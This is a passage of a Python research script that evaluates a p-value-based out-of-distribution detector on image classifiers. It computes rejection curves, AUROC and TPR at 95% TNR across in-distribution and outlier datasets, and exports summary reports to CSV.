limit=None,\n                  simes_l=False, fusions=False, keep_intermidiate_pvalues=False,\n                  temperature_cal_loader=None, temperature=None, plot=False, msp=True):\n    # default the alpha grid before binding it into the curve helper;\n    # building the partial first would capture None\n    alpha_list = alpha_list or [0.05]\n    gen_curve_fn = partial(_gen_curve, alpha_list=alpha_list)\n    TNR95_id = alpha_list.index(0.05)\n    rejected = {}\n    master_pvalues_dict = {}\n    predictions = {}\n    accuracy_dict = MeterDict(AverageMeter)\n\n    def _extend_master_pvalues_dict(pvalues_dict, prefix=''):\n        for reduction_name, pvalues in pvalues_dict.items():\n            reduction_name = f'{prefix}-{reduction_name}'\n            _maybe_concat_tensor_dict(master_pvalues_dict, reduction_name, pvalues)\n\n    def _evaluate_pvalues_dict(pvalues_dict, logits, labels=None): #, prefix=''):\n        predicted = logits.argmax(1).cpu()\n        num_samples = logits.shape[0]\n        num_classes = logits.shape[1]\n        if labels is not None:\n            correct_predictions = labels == predicted\n            incorrect_preds = th.logical_not(correct_predictions)\n\n        for reduction_name, pvalues in pvalues_dict.items():\n            #reduction_name = f'{prefix}-{reduction_name}'\n            # if save_pvalues and bool(re.match(save_pvalues, reduction_name)):\n            
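# (the commented-out block below appears to be a remnant of an older raw-pvalue export path, kept for reference)\n            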
# if reduction_name in save_pvalues_dict:\n # save_pvalues_dict[reduction_name] = th.cat([save_pvalues_dict[reduction_name], pvalues], 0)\n # else:\n # save_pvalues_dict[reduction_name] = pvalues\n\n # measure rejection rates for a range of pvalues under each measure and each reduction\n if reduction_name not in rejected:\n rejected[reduction_name] = MeterDict(meter_factory=SimpleOnlineMeterFactory(batched=True))\n if pvalues.shape[1] != num_classes:\n rejected[reduction_name].update({\n 'joint_pval_roc': gen_curve_fn(pvalues.squeeze(1)),\n # 'max_pval_roc': gen_curve_fn(best_class_pval),\n })\n else:\n # aggragate pvalues or return per reduction score\n # best_class_pval, best_class_pval_id = pvalues.max(1)\n class_conditional_pval = pvalues[th.arange(num_samples), predicted]\n # joint dstribution: single pvalue for all classes\n rejected[reduction_name].update({\n 'class_conditional_pval_roc': gen_curve_fn(class_conditional_pval),\n # 'max_pval_roc': gen_curve_fn(best_class_pval),\n })\n if in_dist:\n t1_likely, t5_likely = accuracy(pvalues, labels, (1, 5))\n\n # rescaled_outputs = out*pvalues\n # t1_rescaled, t5_rescaled = accuracy(rescaled_outputs, l, (1, 5))\n\n #rescaled_outputs_post_smx = th.nn.functional.softmax(logits, -1) * pvalues\n #t1_rescaled_smx, t5_rescaled_smx = accuracy(rescaled_outputs_post_smx, labels, (1, 5))\n\n accuracy_dict.update({\n f'{reduction_name}-pval_acc': (th.stack([t1_likely, t5_likely]), num_samples),\n # f'{reduction_name}-rescaled_t1': (t1_rescaled, out.shape[0]),\n # f'{reduction_name}-rescaled_t5': (t5_rescaled, out.shape[0]),\n # f'{reduction_name}-rescaled-smx_acc': (\n # th.stack([t1_rescaled_smx, t5_rescaled_smx]), num_samples),\n })\n\n # pvalue of the annotated class\n true_class_pval = pvalues[th.arange(num_samples), labels]\n # the pvalue of correct class prediction\n correct_pred_pvalues = true_class_pval[correct_predictions]\n # what was the pvalue of the correct class pval when prediction was wrong\n true_class_pvalues_on_error = true_class_pval[incorrect_preds]\n predicted_class_pvalues_on_error = class_conditional_pval[incorrect_preds]\n rejected[reduction_name].update({\n 'true_pval_mean': true_class_pval,\n 'correct_pval_mean': correct_pred_pvalues,\n 'incorrect_pval_mean': predicted_class_pvalues_on_error,\n 'true_pval_on_error_mean': true_class_pvalues_on_error\n })\n\n rejected[reduction_name].update({\n 'true_pval_roc': gen_curve_fn(true_class_pval),\n 'correct_pval_roc': gen_curve_fn(correct_pred_pvalues),\n 'incorrect_pval_roc': gen_curve_fn(predicted_class_pvalues_on_error),\n })\n\n def _report(level=logging.INFO):\n log_fn = lambda msg: logging.log(level=level, msg=msg)\n compose_acc_msg = lambda key: f'{accuracy_dict[key].avg.numpy()} ({accuracy_dict[key].std.numpy()})'\n if in_dist:\n log_fn(f'\\nModel accuracy: {compose_acc_msg(\"model_acc\")}')\n\n for reduction_name in rejected.keys():\n log_fn(f'\\t{reduction_name} metric:')\n if in_dist and f\"{reduction_name}-pval_acc\" in accuracy_dict:\n # report mean accuracy\n log_fn(f'\\t\\tPVAL accuracy: {compose_acc_msg(f\"{reduction_name}-pval_acc\")} \\t')\n #log_fn(f'\\t\\tSCALED-SMX accuracy: {compose_acc_msg(f\"{reduction_name}-rescaled-smx_acc\")} \\t')\n # log_fn(f'\\t\\tSCALED: Prec@1 {accuracy_dict[f\"{reduction_name}-rescaled_t1\"].avg:.3f} '\n # f'({accuracy_dict[f\"{reduction_name}-rescaled_t1\"].std:.3f}) \\t'\n # f'Prec@5 {accuracy_dict[f\"{reduction_name}-rescaled_t5\"].avg:.3f} '\n # f'({accuracy_dict[f\"{reduction_name}-rescaled_t5\"].std:.3f})')\n\n # report 
rejection results\n            # log_fn(f'\\t\\tMAX_PVAL-Rejected: {rejected[reduction_name][\"max_pval_roc\"].mean.numpy()[TNR95_id-5:TNR95_id+5]}')\n            for n, rejection_meter in rejected[reduction_name].items():\n                if n.endswith('_pval_roc'):\n                    log_fn(\n                        f'\\t\\t{n[:-9]}-Rejected: {rejected[reduction_name][n].mean.numpy()[TNR95_id - 5:TNR95_id + 5]}')\n\n        log_fn(f'\\tRejection results around TNR:{alpha_list[TNR95_id]}\\tTNR_ID:{TNR95_id}')\n\n    def _predict():\n        intermidiate_pvalues = []\n        _labels = []\n        _logits = []\n        model.eval()\n        model.to(model_device)\n        batch_count = 0\n        with th.no_grad():\n            for d, l in tqdm.tqdm(loader, total=len(loader)):\n                if limit and batch_count * d.shape[0] >= limit:\n                    break\n                batch_count += 1\n                out = model(d.to(model_device))\n                _logits.append(out)\n                if in_dist:\n                    # model accuracy\n                    t1, t5 = accuracy(out, l, (1, 5))\n                    accuracy_dict.update({'model_acc': (th.stack([t1, t5]), out.shape[0])})\n                    _labels.append(l)\n\n                if keep_intermidiate_pvalues:\n                    #todo concat instead\n                    intermidiate_pvalues.append(detector.stats_recorder.record.copy())\n\n                ## extract pvalues and evaluate them\n                if isinstance(detector.filter_layer, ls.GroupWhiteListInclude):\n                    pvalues_dict_fisher_groups = detector.get_fisher_groups()\n                    _extend_master_pvalues_dict(pvalues_dict_fisher_groups, 'fisher_group')\n                    #call _evaluate_pvalues_dict to average over each batch (reduce memory)\n                    #_evaluate_pvalues_dict(out,l,pvalues_dict_fisher_groups, 'fisher_group')\n\n                pvalues_dict_fisher = detector.get_fisher()\n                _extend_master_pvalues_dict(pvalues_dict_fisher, 'fisher')\n                #_evaluate_pvalues_dict(out,l,pvalues_dict_fisher, 'fisher')\n                if simes_l:\n                    pvalues_dict_simes = detector.get_simes()\n                    _extend_master_pvalues_dict(pvalues_dict_simes, 'simes')\n                    #_evaluate_pvalues_dict(out,l,pvalues_dict_simes, 'simes')\n\n                if fusions:\n                    if simes_l:\n                        joint_dict = {}\n                        for pval_layer_reduction_method, pval_dict in zip(['simes', 'fisher'],\n                                                                          [pvalues_dict_simes, pvalues_dict_fisher]):\n                            joint_dict.update({f'{pval_layer_reduction_method}-{rm}': p for rm, p in pval_dict.items()})\n                        pvalues_fusion = _fusion_pvalues(joint_dict, 2)\n                    else:\n                        pvalues_fusion = _fusion_pvalues(pvalues_dict_fisher, 2)\n                    _extend_master_pvalues_dict(pvalues_fusion, 'fusion')\n                    #_evaluate_pvalues_dict(out,l,pvalues_fusion, 'fusion')\n\n                detector.stats_recorder.record.clear()\n                _report(logging.DEBUG)\n\n        return th.cat(_logits), th.cat(_labels) if in_dist else None, intermidiate_pvalues\n\n    logits, labels, intermidiate_pvalues = _predict()\n    scaled_logits = None\n    ## pack results\n    ret_dict = {}\n    if temperature_cal_loader or temperature:\n        if temperature is None:\n            detector.set_tracking(False)\n            scaled_logits, temperature = temp_scaling(model, temperature_cal_loader, logits, model_device)\n            detector.set_tracking(True)\n        else:\n            scaled_logits = logits / temperature\n\n        predictions['logits_scaled'] = scaled_logits\n    if msp:\n        with th.no_grad():\n            softmax_prob_dict = {'MSP': F.softmax(logits, -1).cpu()}\n            # a tensor has no unambiguous truth value; test for presence explicitly\n            if scaled_logits is not None:\n                softmax_prob_dict['calibrated_MSP'] = F.softmax(scaled_logits, -1).cpu()\n            _extend_master_pvalues_dict(softmax_prob_dict, 'logits')\n\n    with th.no_grad():\n        _evaluate_pvalues_dict(master_pvalues_dict, logits, labels)\n    ## end of eval report\n    logging.info(f'DONE: {getattr(loader.dataset,\"root\",loader.dataset)}')\n    _report()\n\n    if in_dist and plot:\n        fig, (ax1, ax2, ax3) = plt.subplots(3, 1)\n\n    for reduction_name, rejected_p in rejected.items():\n        ## strip meter dict functionality for simpler post-processing\n        reduction_dict = {}\n        for k, v in 
rejected_p.items():\n # keeping meter object - potentially remove it here\n reduction_dict[k] = v\n ret_dict[reduction_name] = reduction_dict\n if in_dist and plot:\n # plot\n ax1.plot(args.alphas, reduction_dict['correct_pval_roc'].mean, label=reduction_name)\n ax2.plot(args.alphas, reduction_dict['incorrect_pval_roc'].mean)\n ax3.plot(reduction_dict['correct_pval_roc'].mean, reduction_dict['incorrect_pval_roc'].mean)\n\n if in_dist and plot:\n ax1.set_ylabel('correct prediction rate')\n ax2.set_ylabel('incorrect prediction rate')\n ax3.set_xlabel('correct rate')\n ax3.set_ylabel('incorrect rate')\n ax2.set_xlabel('assigned probability')\n ax1.legend(loc='upper left')\n plt.show()\n\n master_pvalues_dict['intermidiate_pvalues']=intermidiate_pvalues\n for reduction_name_accuracy, accuracy_d in accuracy_dict.items():\n ret_dict[reduction_name_accuracy] = accuracy_d\n\n #result_summary({args.dataset:ret_dict},args.get_args_dict())\n return ret_dict, master_pvalues_dict, temperature\n\n # Important! recorder hooks should be removed when done\n\n\ndef result_summary(res_dict, args_dict, TNR_target=0.05, skip_pattern=None, include_pattern='.*',\n pvalue_record=None):\n from utils.meters import simple_auc\n from _collections import OrderedDict\n ## if not configured setup logging for external caller\n if not logging.getLogger('').handlers:\n setup_logging()\n in_dist = args_dict['dataset']\n alphas = args_dict['alphas']\n logging.info(f'Report for {args_dict[\"model\"]} - {in_dist}')\n logging.info(f'Tag: {args_dict[\"tag\"]}')\n result_dict = OrderedDict(model=args_dict[\"model\"], in_dist=args_dict['dataset'], LDA=args_dict.get('LDA'),\n joint=args_dict['measure_joint_distribution'], tag=args_dict['tag'],\n channles_sellect=args_dict.get('channel_selection_fn'))\n # read indist results to calibrate alpha value for target TNR\n rows = []\n accuracies = {'model': {}}\n for reduction_name, reduction_metrics in res_dict[in_dist].items():\n accuracies[reduction_name] = {}\n if reduction_name.endswith('_acc'):\n acc = reduction_metrics.mean.cpu().numpy()\n std = reduction_metrics.std.cpu().numpy()\n acc_name = reduction_name.replace('_acc', '')\n if acc_name == 'model':\n reduction_name = 'model'\n if acc_name.endswith('rescaled-smx'):\n reduction_name = acc_name[:-13]\n acc_name = 'model_rescaled_smx'\n elif acc_name.endswith('-pval'):\n reduction_name = acc_name[:-5]\n acc_name = 'pval'\n\n accuracies[reduction_name][f'{acc_name}_t1'] = acc[0]\n accuracies[reduction_name][f'{acc_name}_t5'] = acc[1]\n accuracies[reduction_name][f'{acc_name}_std_t1'] = std[0]\n\n for reduction_name, reduction_metrics in res_dict[in_dist].items():\n if skip_pattern and bool(re.match(skip_pattern, reduction_name)) or include_pattern and not bool(\n re.match(include_pattern, reduction_name)):\n continue\n result_dict['reduction'] = reduction_name\n result_dict.update(**accuracies['model'])\n result_dict.update(**accuracies[reduction_name])\n logging.info(reduction_name)\n if type(reduction_metrics) != dict:\n # report simple metric\n logging.info(f'\\t{reduction_metrics.mean}\\t({reduction_metrics.std})')\n continue\n # report reduction specific metrics\n for metric_name, meter_object in reduction_metrics.items():\n metric_stats = MeterDict()\n if not metric_name.endswith('_roc'):\n logging.info(f'\\t{metric_name}: {meter_object.mean.numpy():0.3}')\n continue\n FPR = meter_object.mean.numpy()\n calibrated_alpha_id = min((FPR < TNR_target).sum() - 1,len(FPR))\n\n if calibrated_alpha_id == -1:\n # all pvalues are larger 
than alpha\n fpr_under_target_alpha = meter_object.mean[0]\n interp_alpha = FPR[0]\n calibrated_alpha_id = 0\n else:\n fpr_under_target_alpha = FPR[calibrated_alpha_id]\n # actual rejection threshold to use for TNR 95%\n interp_alpha = np.interp(0.05, FPR.squeeze(), alphas)\n\n result_dict.update(dict(metric_name=metric_name, FPR_strict=fpr_under_target_alpha,\n FPR_over=FPR[calibrated_alpha_id + 1],\n chosen_alpha=interp_alpha))\n logging.info(f'\\t{metric_name} - in-dist rejected: '\n # f'alpha-{indist_pvalues_roc[alphas.index(TNR_target)]:0.3f} ({TNR_target:0.3f}), '\n f'under-{fpr_under_target_alpha:0.3f} ({alphas[calibrated_alpha_id]:0.3f}), '\n f'interp-{TNR_target:0.3f} ({interp_alpha:0.3f}), '\n f'over-{FPR[calibrated_alpha_id + 1]:0.3f} ({alphas[calibrated_alpha_id + 1]})')\n\n if pvalue_record and reduction_name in pvalue_record[in_dist]:\n if metric_name.startswith('class_cond') and 'predicted_id' in pvalue_record[in_dist]:\n predicted_ids = pvalue_record[in_dist]['predicted_id']\n in_cc_pval_pred = pvalue_record[in_dist][reduction_name][\n th.arange(predicted_ids.shape[0]), predicted_ids]\n else:\n in_cc_pval_pred = pvalue_record[in_dist][reduction_name].max(1)[0]\n\n for target_dataset_name, reduction_metrics in res_dict.items():\n if target_dataset_name != in_dist and metric_name in reduction_metrics[reduction_name]:\n interp_rejected = np.interp(interp_alpha, alphas,\n reduction_metrics[reduction_name][metric_name].mean.numpy())\n TPR = reduction_metrics[reduction_name][metric_name].mean.numpy()\n raw_rejected = TPR[alphas.index(TNR_target)]\n auroc = simple_auc(TPR, FPR)\n logging.info(\n f'\\t\\t{target_dataset_name}:\\traw-{raw_rejected:0.3f}\\tinterp-{interp_rejected:0.3f}\\tAUROC:{auroc:0.3f}')\n if pvalue_record and reduction_name in pvalue_record[target_dataset_name]:\n if metric_name.startswith('class_cond') and 'predicted_id' in pvalue_record[\n target_dataset_name]:\n predicted_ids = pvalue_record[target_dataset_name]['predicted_id']\n out_cc_pval_pred = pvalue_record[target_dataset_name][reduction_name][\n th.arange(predicted_ids.shape[0]), predicted_ids]\n else:\n out_cc_pval_pred = pvalue_record[target_dataset_name][reduction_name].max(1)[0]\n\n m = metric(in_cc_pval_pred.numpy(), out_cc_pval_pred.numpy())\n logging.info(f'\\t\\t\\tbenchmark metrics: {m}')\n result_dict.update(**m)\n\n result_dict.update(\n dict(out_dist=target_dataset_name, TPR95_raw=raw_rejected, TPR95_interp=interp_rejected,\n AUROC=auroc))\n rows.append(result_dict.copy())\n\n if in_dist.startswith('cifar') and target_dataset_name.startswith('cifar'):\n continue\n metric_stats.update(\n dict(TPR95_raw=th.tensor([raw_rejected]), TPR95_interp=th.tensor([interp_rejected]),\n AUROC=th.tensor([auroc])))\n\n if target_dataset_name != in_dist and metric_name in reduction_metrics[reduction_name]:\n result_dict['out_dist'] = 'avg'\n logging.info(\n f'\\tmetric avg stats: {[k + \" \" + str(float(v)) for k, v in metric_stats.get_mean_dict().items()]}')\n result_dict.update(**metric_stats.get_mean_dict())\n rows.append(result_dict.copy())\n return rows\n\n\ndef report_from_file(path, skip_pattern=r'(^fusion)|(.*export*)', include_pattern=r'^fisher-.*-max_simes',\n output='report'):\n from pandas import DataFrame as df\n result_collection = []\n for p in glob(path):\n res = th.load(p, map_location='cpu')\n summ_rows = result_summary(res['results'], res['settings'], skip_pattern=skip_pattern,\n include_pattern=include_pattern,\n pvalue_record=res.get('pvalues_collection'))\n for r in summ_rows:\n 
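# attach provenance (source file, timestamp, layer selections, run settings) to every summary row\n            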
r['result_file_path'] = p\n            r['time_stamp'] = res.get('time_stamp')\n            r['test_layers'] = res.get('test_layers')\n            r['ref_layers'] = res.get('ref_layers')\n            r.update(res['settings'])\n\n        result_collection += summ_rows\n    df(result_collection).to_csv(f'{output}.csv')\n\n\ndef measure_and_eval(args, export_pvalues=False, measure_only=False, cache_measure=True,\n                     keep_intermidiate_pvalues=False, compare_scaling=False, simes_on_layers=False,\n                     LDA_fisher=False, num_workers=2):\n    from datetime import datetime\n    TIME_START = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n    rejection_results = {}  # dataset , out\n    model = getattr(models, args.model)(**(args.model_cfg))\n    checkpoint = th.load(args.ckt_path, map_location='cpu')\n    if 'state_dict' in checkpoint:\n        checkpoint = checkpoint['state_dict']\n\n    model.load_state_dict(checkpoint)\n    if args.track_output:\n        track_smx_output = 'softmax' in args.track_output\n        track_fc_output = 'fc' in args.track_output\n        model = TrackOutput(model, track_smx_output, track_fc_output, temperature=args.temperature)\n\n    expected_transform_measure = get_transform(args.transform_dataset or args.dataset, augment=args.augment_measure)\n    logging.info(f'get first split for measure {args.measure_split_part1}')\n    measure_dataset_part1 = get_ds_split_modifier(args.dataset,args.measure_split_part1,expected_transform_measure,args.limit_measure,True)\n    logging.info(f'split 1: size {len(measure_dataset_part1)}')\n    if args.measure_split_part2:\n        logging.info(f'get second split for measure {args.measure_split_part2}')\n        measure_dataset_part2 = get_ds_split_modifier(args.dataset,args.measure_split_part2,expected_transform_measure,args.limit_measure,True)\n    else:\n        measure_dataset_part2 = measure_dataset_part1\n    logging.info(f'split 2: size {len(measure_dataset_part2)}')\n\n    exp_tag = f'{args.model}-{args.dataset}'\n    if args.augment_measure:\n        exp_tag += f'-augment'\n    if args.measure_joint_distribution:\n        exp_tag += f'-joint'\n    if args.LDA:\n        exp_tag += f'-LDA'\n    if _MONITOR_OP_OUTPUTS:\n        exp_tag += '-OUTMODE'\n    if 'layer_select' in args.tag:\n        sub_tags = args.tag.split('+')\n        if len(sub_tags) == 1:\n            calib_tag = '-@baseline'\n        else:\n            calib_tag = '-@'\n            for t in sub_tags:\n                if 'layer_select' in t:\n                    continue\n                calib_tag += f'{t}+'\n\n            calib_tag = calib_tag[:-1]\n\n    else:\n        calib_tag = args.tag\n\n    calib_tag = f'{exp_tag}-{calib_tag}'\n    part1_cache = os.path.join(args.cache_dir, f'measured_stats_per_class-{exp_tag}-raw.pth')\n    calibrated_path = os.path.join(args.cache_dir, f'measured_stats_per_class-{calib_tag}.pth')\n    exp_tag += f'-{args.tag}'\n    if args.select_layer_mode and not args.recompute:\n        import time\n        while not os.path.exists(calibrated_path):\n            print(f'waiting for file: {calibrated_path}')\n            time.sleep(500)\n\n    if not args.recompute and os.path.exists(calibrated_path):\n        ref_stats = th.load(calibrated_path,\n                            map_location=args.collector_device if args.collector_device != 'same' else args.device)\n        if type(ref_stats) == dict:\n            args.spatial_reductions = ref_stats['args'].spatial_reductions\n            ref_stats = ref_stats['refs']\n    else:\n        ref_stats = measure_v2(model, args, part1_cache, measure_dataset_part1, measure_dataset_part2,\n                               num_workers=num_workers, drop_last=_DROP_LAST_BATCH_MEASURE)\n        if cache_measure:\n            logging.info('saving reference stats dict')\n            th.save(dict(refs=ref_stats, args=args), calibrated_path)\n    if measure_only:\n        return\n    if args.select_layer_mode:\n        selected_layers_names, 
args.include_matcher_fn_test = ls.get_select_layers_from_preset(args, model, ref_stats)\n logging.info(f'selected {len(selected_layers_names)}/{len(ref_stats[0])} layers: {selected_layers_names}')\n\n logging.info(f'building OOD detector')\n detector = OODDetector(model, ref_stats, right_sided_fisher_pvalue=args.right_sided_fisher_pvalue,\n include_matcher_fn=args.include_matcher_fn_test, shared_reductions=args.spatial_reductions,\n fisher_layer_weights=args.fisher_layer_weights, LDA_fisher=LDA_fisher)\n gc.collect()\n logging.info(f'evaluating inliers')\n expected_transform_test = get_transform(args.transform_dataset or args.dataset, augment=args.augment_test)\n val_ds = get_ds_split_modifier(args.dataset, args.test_split, expected_transform_test, args.limit_test, False)\n\n # todo add adversarial samples test\n # optional run in-dist data evaluate per class to simplify analysis\n # for class_id,class_name in enumerate(val_ds.classes):\n # sampler = th.utils.data.SubsetRandomSampler(th.where(targets==class_id)[0]) #th.utils.data.RandomSampler(ds, replacement=True,num_samples=5000)\n sampler = None\n val_loader = th.utils.data.DataLoader(\n val_ds, sampler=sampler,\n batch_size=args.batch_size_test, shuffle=False,\n num_workers=num_workers, pin_memory=True, drop_last=False)\n\n temperature_cal_loader = None\n if compare_scaling:\n temperature_cal_loader = th.utils.data.DataLoader(\n measure_dataset_part2, sampler=sampler,\n batch_size=args.batch_size_test, shuffle=False,\n num_workers=0, pin_memory=False, drop_last=False)\n\n e_ret = evaluate_data(val_loader, model, detector, args.device, alpha_list=args.alphas, in_dist=True,\n limit=args.limit_test,\n keep_intermidiate_pvalues=keep_intermidiate_pvalues,\n temperature_cal_loader=temperature_cal_loader,\n simes_l=simes_on_layers)\n\n if export_pvalues:\n pvalues_collection = {args.dataset: e_ret[1]}\n rejection_results[args.dataset] = e_ret[0]\n\n logging.info(f'evaluating outliers')\n\n for ood_dataset in args.ood_datasets:\n if ood_dataset == args.dataset:\n continue\n ood_ds = get_dataset(ood_dataset, 'val', expected_transform_test, limit=args.limit_test,\n per_class_limit=False, shuffle_before_limit=True, limit_shuffle_seed=0)\n\n ood_loader = th.utils.data.DataLoader(\n ood_ds, sampler=None,\n batch_size=args.batch_size_test, shuffle=False,\n num_workers=num_workers, pin_memory=True, drop_last=False)\n logging.info(f'evaluating {ood_dataset}')\n e_ret = evaluate_data(ood_loader, model, detector, args.device, alpha_list=args.alphas,\n limit=args.limit_test,\n keep_intermidiate_pvalues=keep_intermidiate_pvalues,\n temperature=e_ret[2] if compare_scaling else None,\n simes_l=simes_on_layers)\n if export_pvalues:\n pvalues_collection[ood_dataset] = e_ret[1]\n rejection_results[ood_dataset] = e_ret[0]\n\n save = {'results': rejection_results, 'settings': args.get_args_dict(), 'time_stamp': TIME_START,\n 'test_layers': detector.test_layers, 'ref_layers': detector.ref_layers}\n\n for reduction_name, fn in args.spatial_reductions.items():\n if isinstance(fn, rd.StatefulReductionFactory):\n fn.reset()\n\n if export_pvalues:\n save['pvalues_collection'] = pvalues_collection\n exp_tag += '-pval_export'\n\n th.save(save, os.path.join(args.results_root, f'{TIME_START}_experiment_results-{exp_tag}.pth'))\n result_summary(rejection_results, args.get_args_dict(), pvalue_record=pvalues_collection)\n\n\nif __name__ == '__main__':\n np.set_printoptions(3)\n from presets import edit_data_regime, train_val_test_on_val_experiments, 
oe_experiments_train_val_test_on_val, \\\n        lee2018_experiments, train_val_experiments, val_only_experiments, \\\n        oe_experiments, oe_experiments_tv, large_scale\n    from adversarial_compare_config import _SMALL_SCALE_OOD_DATASETS, _LARGE_SCALE_OOD_DATASETS\n    import argparse\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--seed', default=0, type=int)\n    parser.add_argument('--device_id', default=0, type=int)\n    parser.add_argument('--n_workers', default=2, type=int)\n    parser.add_argument('--split_exp_to_num_chunks', default=None, type=int)\n    parser.add_argument('--exp_chunk_id', default=0, type=int)\n    parser.add_argument('--limit_test', default=None, type=int)\n    parser.add_argument('--exp_ids', default=None, type=int, nargs='+')\n    parser.add_argument('--cut', default=0, type=float)\n    parser.add_argument('--temperature', default=None, type=float)\n    parser.add_argument('--last_layer_weight', default=None, type=float)\n    parser.add_argument('--slice_layers_mode', default=None, type=str,\n                        choices=['auto', 'auto_group', 'slice', 'positional'])\n    parser.add_argument('--ood_datasets', default=None, type=str, nargs='+',\n                        choices=_SMALL_SCALE_OOD_DATASETS + _LARGE_SCALE_OOD_DATASETS)\n    parser.add_argument('--tag_prefix', default='', type=str)\n    parser.add_argument('--track_last_layer_output', default='fc', type=str, choices=['', 'softmax', 'fc'])\n    parser.add_argument('-r', action='store_true')\n    parser.add_argument('-last_layer_only', action='store_true')\n    parser.add_argument('-measure_val_test_val', action='store_true')\n    parser.add_argument('-ablation', action='store_true')\n    parser.add_argument('-LDA_fisher', action='store_true')\n    terminal = parser.parse_args()\n    ##### master controls\n    os.environ['CUDA_VISIBLE_DEVICES'] = str(terminal.device_id)\n\n    _split_by_dev = False\n    OFFSET = 0\n    SEED = terminal.seed\n    RANDOM_CHANNEL_CUT = terminal.cut\n    RECOMPUTE = terminal.r\n    N_ALPHAS = 100\n    LIMIT_TEST = None  # 10000\n    LAST_LAYER_WEIGHT = terminal.last_layer_weight  # 1.0 #None # normalized weight of final layer for fisher statistic\n    CLASS_DEPENDENT_OUTPUT = False\n    TRACK_OUTPUT_LAYER = 'fc'  # 'softmax' None 'fc'\n    TAG_BASE = terminal.tag_prefix\n    if terminal.measure_val_test_val:\n        TAG_BASE += 'measure_train_val_test_on_val'  # 'measure_train_val_test_on_val' #'My-Tag'\n        experiments = train_val_test_on_val_experiments + oe_experiments_train_val_test_on_val\n    else:\n        TAG_BASE += 'measure_train_test_on_val'  # 'measure_train_val_test_on_val' #'My-Tag'\n        experiments = lee2018_experiments + oe_experiments  # + large_scale\n\n    if terminal.ablation:\n        TAG_BASE += '_ablation'\n\n    if terminal.exp_ids:\n        experiments = [experiments[id] for id in terminal.exp_ids]\n    if terminal.split_exp_to_num_chunks:\n        # both conditions must actually be checked; a single assert with the\n        # second expression as its message would never enforce it\n        assert terminal.exp_chunk_id >= 0\n        assert terminal.split_exp_to_num_chunks > 1\n        n_exp = len(experiments)\n        exp_per_chunk = int(np.ceil(n_exp / terminal.split_exp_to_num_chunks))\n        _start = terminal.exp_chunk_id * exp_per_chunk\n        _end = _start + exp_per_chunk\n        print(f'total experiments before chunking: {n_exp},\t\nstart_id {_start},\tstop_id {_end - 1}')\n        experiments = experiments[_start:_end]\n    print(f'running {len(experiments)} experiments')\n    # else:\n    #     experiments = [experiments[(DEVICE_ID - OFFSET)]]\n\n    # experiments = edit_data_regime(lee2018_experiments.copy(), measure_size_1=1.0, measure_size_2=1.0, test_size=1.0,\n    #                                measure_split_1='train', measure_split_2 = 'train',\n    #                                allow_intersecting_measure = False, allow_intersecting_test = True, seed = 0)\n\n    measure_kwargs = 
dict(export_pvalues=r'.*', # r'^fisher-.*-max',## this is require for reference metric\n measure_only=False,\n cache_measure=True,\n simes_on_layers=terminal.ablation,\n keep_intermidiate_pvalues=False,\n compare_scaling=False,\n LDA_fisher=terminal.LDA_fisher,\n num_workers=terminal.n_workers)\n\n\n def common_overwrites():\n alphas = [i / N_ALPHAS for i in range(0, N_ALPHAS + 1)]\n recompute = terminal.r\n device = 'cuda'\n if terminal.limit_test:\n limit_test = terminal.limit_test\n augment_measure = False\n measure_joint_distribution = False # do not measure per class\n tag = TAG_BASE\n\n if SEED is not None:\n tag += f'-seed_{SEED}'\n\n if RANDOM_CHANNEL_CUT > 0:\n tag += f'-random_c_select_{RANDOM_CHANNEL_CUT}'\n channel_selection_fn = partial(cs.sample_random_channels, relative_cut=RANDOM_CHANNEL_CUT,\n seed=SEED) # None\n else:\n channel_selection_fn = None\n # channel_selection_fn = partial(cs.find_most_seperable_channels_class_dependent, relative_cut=0.2)\n # track_output = 'softmax'\n\n ## use mahalanobis as channel reduction under LDA assumption\n # mahalanobis_ch_reduction=True\n # LDA = True\n\n ## grouped cluster layers\n # select_layer_mode = 'auto_group'# 'auto'\n # select_layer_kwargs = dict(t=3, criterion='maxclust', channle_reduction_method='simes_c')#{'normalized_positions' : [0.8,0.9,1.0]} # None # dict(t=3, criterion='maxclust', channle_reduction_method='simes_c')\n\n fisher_ch_reduction = terminal.ablation\n track_output = terminal.track_last_layer_output\n temperature = terminal.temperature\n if track_output:\n tag += f'-{track_output}'\n if terminal.last_layer_weight:\n ## place more weight on final layer pvalue when computing fisher statistic\n tag += f'-weighted'\n if terminal.last_layer_weight == 1.0:\n ## conformal - output only\n include_matcher_fn_test = ls.output_only_fn\n include_matcher_fn_measure = ls.output_only_fn\n if track_output == 'fc':\n fisher_layer_weights = {'output_fc': terminal.last_layer_weight}\n elif track_output == 'softmax':\n tag += f'_temperature_{temperature}' # todo update this with actual val\n fisher_layer_weights = {'output_softmax': terminal.last_layer_weight}\n\n if CLASS_DEPENDENT_OUTPUT:\n channel_selection_fn = cs.output_select_channels_class_dependent\n tag += '-CDO'\n\n ## slice layers\n # select_layer_mode = 'slice' #'positional' # None # 'auto_group'# 'auto'\n # select_layer_kwargs = dict(start=0.75,stop=0.9999,stride=3,keep_last_n=2)\n\n # limit_measure = None #1000 # per class limit\n if terminal.ood_datasets:\n ood_datasets = terminal.ood_datasets\n # batch_size_measure=5000\n return locals()\n\n # exp_ids=[]\n # experiments = [experiments[exp_id] for exp_id in exp_ids]\n setup_logging()\n for args in experiments:\n args.update(common_overwrites())\n logging.info(args)\n if args.num_classes > 300:\n _USE_PERCENTILE_DEVICE = True\n else:\n _USE_PERCENTILE_DEVICE = False\n measure_and_eval(args, **measure_kwargs)\n # report_from_file('./Final_results_baseine_2020-10-08/*/*', skip_pattern=None, include_pattern=r'.*')\n report_from_file(os.path.join(args.results_root, f'*experiment_results-*{args.tag}*'),\n # skip_pattern=r'(^simes)|(^fusion)',\n include_pattern=r'(.*)', output=os.path.join(args.results_root,args.tag))\npass\n\n# record = th.load(f'record-{args.dataset}.pth')\n# adv_tag = 'FGSM_0.1'\n# layer_inputs = recorded[layer_name]\n# layer_inputs_fgsm = recorded[f'{layer_name}-@{adv_tag}']\n# def _maybe_slice(tensor, nsamples=-1):\n# if nsamples > 0:\n# return tensor[0:nsamples]\n# return tensor\n#\n# for layer_name 
